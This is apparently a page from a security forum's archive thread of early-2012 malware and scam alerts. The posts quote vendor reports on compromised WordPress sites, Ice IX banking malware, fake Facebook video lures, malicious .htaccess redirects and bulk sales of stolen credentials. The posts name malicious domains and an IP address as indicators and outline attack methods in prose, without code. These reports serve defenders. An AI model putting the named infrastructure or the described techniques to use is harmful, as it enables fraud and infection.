Page 57 of 70 FirstFirst ... 74753545556575859606167 ... LastLast
Results 561 to 570 of 694

Thread: SPAM frauds, fakes, and other MALWARE deliveries - archive

  1. #561
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,881

    Exclamation Cybercriminals moving from TLD .ru to .su

    FYI...

    Cybercriminals moving from TLD .ru to .su
    - http://www.abuse.ch/?p=3581
    Jan 29, 2012 - "... The Top Level Domain .ru is managed by the Coordination Center for TLD RU (cctld.ru). CCTLD.ru finally did their job well and addressed the reputation problem TLD.ru had by setting up new terms and conditions for domain name registration of .ru domains... .su is (... was) the Top Level Domain for the Soviet Union, which we all know doesn’t exist any more. Nevertheless, TLD .su (... operated by RIPN) is still active today which means that people can still register domain names with that TLD. As of today I’m seeing an increasing number of malicious .su domains being used by botnet herders. In fact this means that the criminals seem to be switching from .ru to .su ... If you don’t see any legit .su domains being hit/used in your company just simply -block- it."

    Thanks for the link go to:
    - http://www.malwaredomains.com/wordpress/?p=2428
    Jan 29, 2012

    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  2. #562
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,881

    Default WordPress exploit in-the-wild for v3.2.1 sites ...

    FYI...

    - http://community.websense.com/blogs/...ploit-kit.aspx
    * Update 2012/02/06: After obtaining access to logs and PHP files from compromised Web servers, further analysis indicates that most of the compromised Web sites were running older versions of WordPress, but they were not all running 3.2.1. The attackers’ exact point of entry is uncertain. At first, we suspected vulnerable WordPress plugins, because a subset of analyzed sites were running vulnerable versions of the same WordPress plugins. Now that we have access to data from several compromised Web servers, the logs show us that, in some cases, the point of entry was compromised FTP credentials. In several instances, once attackers had access, they scanned WordPress directories and injected specific files (e.g., index.php and wp-blog-header.php) with malicious PHP code.
    ___

    WordPress exploit in-the-wild for v3.2.1 sites ...
    - http://community.websense.com/blogs/...ploit-kit.aspx
    30 Jan 2012 - "... site was compromised because it was running an old version of Wordpress (3.2.1) that is vulnerable to publicly available exploits... more interesting is the redirection chain and resulting exploit site... From our analysis the number of infections is growing steadily (100+)... The Java exploit being served is CVE-2011-3544* (Oracle Java Applet Rhino Script Engine Remote Code Execution), which most Exploit Kits adopted in December 2011 because it is cross-platform and exploits a design flaw. Normally, kits use a variety of exploits... regardless of what OS or browser we used for testing, this Exploit Kit attempted to exploit ONLY our Java Runtime Environment (JRE). It did not attempt -any- other exploit... Websense... has found 100+ compromised Web sites, all with similar infection characteristics. The compromised Web sites all share these traits:
    > Running WordPress 3.2.1
    > Force a drive by download via iframe to the same malicious set of domains hosting a PHP Web page in the form of: [subdomain] .osa .pl/showthread.php?t=.*
    > Attempt exploitation using CVE-2011-3544
    If exploitation is successful, ( the Tdss rootkit will be installed ) on the user's machine.
    If you're running WordPress 3.2.1, we recommend that:
    You upgrade to the latest stable version of WordPress**.
    Check the source code of all your Web pages to see if you've been infected (see the code above). If you have been infected, be sure to upgrade WordPress while simultaneously removing the injected code so that your Web pages aren't simply being reinfected after being cleaned.
    ** https://wordpress.org/download/
    January 3, 2012 - "The latest stable release of WordPress (Version 3.3.1) is available..."

    Massive Compromise of WordPress-based sites...
    - http://labs.m86security.com/2012/01/...fine%E2%80%99/
    Jan 30, 2012 - "... hundreds of websites, based on WordPress 3.2.1... The attacker uploaded an HTML page to the standard Uploads folder and that page redirects the user to the Phoenix Exploit Kit... logs show that users from at least -400- compromised sites were -redirected- to Phoenix exploit pages..."
    ___

    SiteCheck scanner
    - http://sucuri.net/global
    ___

    * http://web.nvd.nist.gov/view/vuln/de...=CVE-2011-3544
    Last revised: 01/27/2012
    "... vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7 and 6 Update 27 and earlier..."
    CVSS v2 Base Score: 10.0 (HIGH)

    Latest Java versions available here:
    Downloads: http://www.oracle.com/technetwork/ja...ads/index.html

    JRE 6u30: http://www.oracle.com/technetwork/ja...d-1377142.html

    JRE 7u2: http://www.oracle.com/technetwork/ja...d-1377135.html
    ___

    - https://www.virustotal.com/file/7b00...b73e/analysis/
    File name: file-3486436_jar
    Detection ratio: 12/41
    Analysis date: 2012-01-31

    - https://www.virustotal.com/file/f7a1...2483/analysis/
    File name: 39301c3e4ae8ed0e4faf0c3c18cf54a0
    Detection ratio: 10/43
    Analysis date: 2012-01-30

    - https://www.virustotal.com/file/4120...is/1327739797/
    File name: oleda0.027112496150291654.exe
    Detection ratio: 9/43
    Analysis date: 2012-01-28

    Last edited by AplusWebMaster; 2012-02-07 at 15:03.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  3. #563
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,881

    Thumbs down Malware redirects bank phone calls to Attackers

    FYI...

    Malware redirects bank phone calls to Attackers
    - http://www.trusteer.com/blog/malware...alls-attackers
    Feb 01, 2012 - "... some new Ice IX configurations that are targeting online banking customers in the UK and US. Ice IX is a modified variant of the ZeuS financial malware platform. In addition to stealing bank account data, these Ice IX configurations are capturing information on telephone accounts belonging to the victims. This allows attackers to divert calls from the bank intended for their customer to attacker controlled phone numbers. We believe the fraudsters are executing fraudulent transactions using the stolen credentials and redirecting the bank’s post-transaction verification phone calls to professional criminal caller services (discussed in a previous Trusteer blog*) that approve the transactions. In one attack captured by Trusteer researchers, at login the malware steals the victim’s user id and password, memorable information/secret question answer, date of birth and account balance. Next, the victim is asked to update their phone numbers of record (home, mobile and work) and select the name of their service provider from a drop-down list. In this particular attack, the three most popular phone service providers in the UK are presented: British Telecommunications, TalkTalk and Sky... To enable the attacker to modify the victim’s phone service settings, the victim is then asked by the malware to submit their telephone account number. This is very private data typically only known to the phone subscriber and the phone company. It is used by the phone company to verify the identity of the subscriber and authorize sensitive account modifications such as call forwarding. The fraudsters justify this request by stating this information is required as a part of verification process caused by "a malfunction of the bank’s anti-fraud system with its landline phone service provider"... As we discussed in a recent blog**, fraudsters are increasingly turning to these post-transaction attack methods to hide fraudulent activity from the victim and block email and phone communication from the bank. This allows attackers to circumvent security mechanisms that look for anomalies once transactions have already been executed by the user..."
    * http://www.trusteer.com/blog/apply-s...urself-offline

    ** http://www.trusteer.com/blog/post-tr...ntion-controls
    ___

    - http://www.darkreading.com/taxonomy/...e/id/232600093
    Feb 01, 2012

    Last edited by AplusWebMaster; 2012-02-03 at 18:12.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  4. #564
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,881

    Thumbs down Facebook malware scam

    FYI...

    Facebook malware scam ...
    - http://nakedsecurity.sophos.com/2012...tatus-updates/
    Feb 3, 2012 - "... worrying number of Facebook users posting the same status messages today, claiming that the United States has attacked Iran and Saudi Arabia... If you visit the link mentioned in the status update, you are taken to a -fake- CNN news webpage which claims to contain video footage of conflict... clicking on the video thumbnail prompts the webpage to ask you to install an update to Adobe Flash... Of course, it's not a real Flash update, but malware instead. Remember, you should only ever download a Flash update from the genuine Adobe website. The malware - which Sophos is adding detection for as Troj/Rootkit-KK - drops a rootkit called Troj/Rootkit-JV onto your Windows computer. In addition, Sophos detects the behaviour of the malware as HPsus/FakeAV-J..."

    - http://google.com/safebrowsing/diagn...=facebook.com/
    "... Part of this site was listed for suspicious activity 436 time(s) over the past 90 days... Of the 102194 pages we tested on the site over the past 90 days, 172 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2012-02-07, and the last time suspicious content was found on this site was on 2012-02-07... Malicious software includes 76 trojan(s), 60 scripting exploit(s). Successful infection resulted in an average of 7 new process(es) on the target machine. Malicious software is hosted on 147 domain(s)... 28 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site... This site was hosted on 74 network(s) including AS32934 (FACEBOOK), AS209 (QWEST), AS2914 (NTT).... Over the past 90 days, facebook.com appeared to function as an intermediary for the infection of 31 site(s)... It infected 6 domain(s)..."

    - http://google.com/safebrowsing/diagnostic?site=AS:32934
    "... over the past 90 days, 151 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2012-02-07, and the last time suspicious content was found was on 2012-02-07... Over the past 90 days, we found 24 site(s) on this network... that appeared to function as intermediaries for the infection of 29 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 2 site(s)... that infected 6 other site(s)..."

    Last edited by AplusWebMaster; 2012-02-07 at 23:31.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  5. #565
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,881

    Thumbs down Mobile malware from German svr ...

    FYI...

    Mobile malware from German svr... 1,351 sites
    - http://blog.trendmicro.com/malicious...an-ip-address/
    Feb 7, 2012 - "... recently found a server that hosts a great number of sites that are used to launch mobile malware, targeting Android OS and Symbian (specifically the J2ME platform). The server, located in Germany, is managed by a hosting provider known as a haven for cyber criminals. We found a total of 1,351 websites hosted on the said server and categorize the sites into five segments based on the type of guise they use for the distributed malware:
    Android Market apps
    Opera Mini/ Phone Optimizer apps
    Pornographic apps (sites were unavailable during time of checking)
    App storage sites
    Others (sites that were inaccessible during time of checking)...
    ... the hosted Apps were still up thus making them available for download through the Android Market App and the Opera Mini/Photo Optimizer App sites. The sites under Android Market apps displayed a website very much similar to the legitimate one. They feature popular applications like WhatsApp, Facebook, Facebook Messenger, Barcode Scanner, Skype, Google Maps, Gmail, YouTube, and others. The files downloaded from such sites are now detected as ANDROIDOS_FAKENOTIFY.A... the sites that feature download links for Opera Mini and Phone Optimizer lead to J2ME_SMSSEND.E - a malware that can run on devices that support MIDlets... Among all the categories mentioned, most of sites promoted Opera Mini updates and Photo Optimizer Apps compared with others.. the attackers are not necessarily targeting only one platform... we also saw that cybercriminals use different social engineering lures. Also, despite the emergence and prevalence of platforms such as Android and iOS, the Symbian platform still seems to be targeted as well..."

    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  6. #566
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,881

    Thumbs down Malware -redirects- to enormousw1illa .com...

    FYI...

    Malware -redirects- to enormousw1illa .com
    - http://google.com/safebrowsing/diagn...ousw1illa.com/
    2012-02-08 - "Site is listed as suspicious... the last time suspicious content was found on this site was on 2012-02-08. Malicious software includes 8 trojan(s). This site was hosted on 2 network(s) including AS48691* (SPECIALIST), AS17937 (NDMC)... Over the past 90 days, enormousw1illa .com appeared to function as an intermediary for the infection of 177 site(s)... this site has hosted malicious software over the past 90 days. It infected 1090 domain(s)..."
    * http://google.com/safebrowsing/diagnostic?site=AS:48691

    - http://blog.sucuri.net/2012/02/malwa...1illa-com.html
    Feb 2, 2012 - "... seeing a large number of sites compromised with a conditional redirection to the domain http ://enormousw1illa .com/ (194.28.114.102). On all the sites we analyzed, the .htaccess file was modified so that if anyone visited the site from Google, Bing, Yahoo, or any major search engine (by checking the referer), it would get -redirected- to that malicious domain (http ://enormousw1illa com/nl-in .php?nnn=556)... this malware is hosted at the same IP address as other domains that were used in .htaccess attacks in the past**, so we think it is all done by the same group..."
    ** http://blog.sucuri.net/2011/11/htacc...o-dot-com.html

    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  7. #567
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,881

    Thumbs down Free MS Points? Game Over ...

    FYI...

    Free Microsoft Points? Game Over ...
    - http://www.gfi.com/blog/free-microso...game-over-man/
    Feb 8, 2012 - "There’s an Xbox code generator floating around on Youtube and other sites right now, and a pretty popular one at that. How popular?... 20,000+ views so far. The program promises all sorts of Xbox freebies – 1 month of Xbox Live, 12 months if you’re feeling particularly greedy and 1600 to 4000 free Microsoft points*. Of course, everything goes without a hitch in the Youtube video: we see the program boot up, the user selects his target – 1600 MS points – and hits the “Generate Code” button. After a short while, we see a “Hooray, it worked” type message and the person in the video is presented with a code.... [and]... Another survey. Does the creator of this program expect you to fill in a survey / sign up to a ringtone service not once but twice? Absolutely. Is it worth downloading this program, filling in some of those offers and trying it out? Absolutely - not."
    * https://en.wikipedia.org/wiki/Microsoft_Points
    "... currency of the Xbox Live Marketplace, Games for Windows - Live Marketplace, Windows Live Gallery, and Zune online stores..."

    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  8. #568
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,881

    Thumbs down Cybercrime "factory outlets" – selling in bulk...

    FYI...

    Cybercrime "factory outlets" – fraudsters selling bulk Facebook, Twitter and Web Site Admin credentials
    - https://www.trusteer.com/blog/cyberc...e-admin-creden
    Feb 08, 2012 - "... discovered two cybercrime rings that are advertising what we refer to as a “Factory Outlet” of login credentials for different web sites including Facebook, Twitter and a leading website administration software called cPanel. Financial malware, like Zeus, SpyEye and others, once it infects a machine, is configured to attack specific online banking web sites. In addition to online banking credentials, the malware also captures login credentials used by the victim’s machine to access other web sites and web applications. To monetize the login credentials that pile up, fraudsters have started setting up “Factory Outlets” to sell them off... cybercriminals are offering to sell login credentials to social network sites such as Facebook and Twitter belonging to users all over the world. These can be purchased in bulk, from specific countries (e.g. USA, UK, and Germany) and even coupled with additional personal information such as email addresses... the fraudsters claim that they have 80GB of stolen data from victims. In another so called “Credential Factory Outlet Sale” advertisement, a botnet operator offers to sell login and URL information that would allow a fraudster to take control of certain web sites. Specifically, the advertiser is offering cPanel credentials..."
    (More detail at the trusteer URL above.)
    ___

    Know your enemies Online (graphic)
    - http://blog.trendmicro.com/wp-conten...nemies_WEB.jpg
    ___

    How web threats spread (graphic)
    - http://www.sophos.com/medialibrary/I...520&h=594&as=1
    Source: Sophos Security Threat Report

    Last edited by AplusWebMaster; 2012-02-08 at 23:27.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  9. #569
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,881

    Thumbs down Top 10 threats for January 2012

    FYI...

    Top 10 threats for January 2012
    - http://www.gfi.com/page/113933/cyber...nge-of-victims
    Feb 08, 2012 - "... Report for January 2012, a collection of the 10 most prevalent threat detections encountered during the month. Last month saw malware attacks targeting a wide range of potential victims, including gamers looking for a Pro Evolution Soccer 2012 game crack, small business owners concerned about the reputation of their business, and government organizations receiving spoofed messages from the United States Computer Emergency Readiness Team (US-CERT)... malware writers installing rootkits on the systems of gamers who were looking for a pirated release of Pro Evolution Soccer 2012... scammers also latched onto the buzz surrounding the upcoming fourth installment of the Halo® video game series... by offering bogus beta invites in return for filling out surveys and recommending links on Facebook and Google+. These attacks leverage the popularity of these titles among the gaming community and are meant to take advantage of the mistakes some users might make when acting out of excitement about a favorite game franchise... phishing emails posing as notices from the Better Business Bureau, claiming that a customer had filed a complaint against the recipient. The messages contained links to malware created using the Blackhole exploit kit. Government body US-CERT served as another disguise for cybercriminals attempting to bait unwitting victims into opening a file that contained a variant of the Zeus/Zbot Trojan. Meanwhile, Tumblr users were baited with “free Southwest Airlines tickets” in exchange for taking surveys and submitting personal information by a phony “Tumblr Staff Blog.” Malware writers and internet scammers also sought to attack a wider cross-section of the population when opportunities presented themselves to creatively piggyback on hot news topics and highly trafficked websites. This past month, the shutdown of popular file hosting website Megaupload led to a domain typo scam targeting both the regular users of the website as well as visitors who were interested in seeing the FBI notice posted on the site. Once the victims reached the misspelled URL, they were -redirected- to various sites promising fake prizes and asking for personal information..."
    (See "Top 10 Threat Detections for January" list at the gfi URL above.)

    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  10. #570
    Adviser Team AplusWebMaster's Avatar
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,881

    Thumbs down Bad news brings SCAMS ...

    FYI...

    Bad news brings SCAMS ...
    - http://blog.trendmicro.com/cybercrim...oustons-death/
    Feb 13, 2012 - "... cybercriminals are naturally out there taking advantage of this unfortunate incident... A fake video was seen spreading via the social networking site Facebook was found... which have the subject “I Cried watching this video. RIP Whitney Houston“, come in the form of a wall post with a link to the supposed video. Once users click on the video, it leads them to a Facebook page that contains a link to the video. However, clicking the said link only leads to several other redirections until users are lead to the usual survey scam site... we also found -101- more survey scam domains registered on the same IP where the domains are hosted.... also found tweets with malicious links that also took advantage of the tag RIP Whitney Houston, which was trending worldwide on Twitter... tweets contain a link to a particular blog dedicated to Whitney Houston. Users viewing this page are then -redirected- to another web site, even without them having to click on anything. The succeeding page is a site that supposedly features several Whitney Houston wallpapers, which users can download. Once users decide to download a wallpaper, a pop up window appear that asks users to donwload some “Whitney Houston ringtones”. Whatever users choose... they will be -redirected- to the a survey site that asks for mobile numbers... Using newsworthy events... is a common bait of cybercriminals to lure users into their schemes... always be cautious before clicking any -news- items in their Facebook or Twitter feeds..."
    (Screenshots available at the trendmicro URL above.)

    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •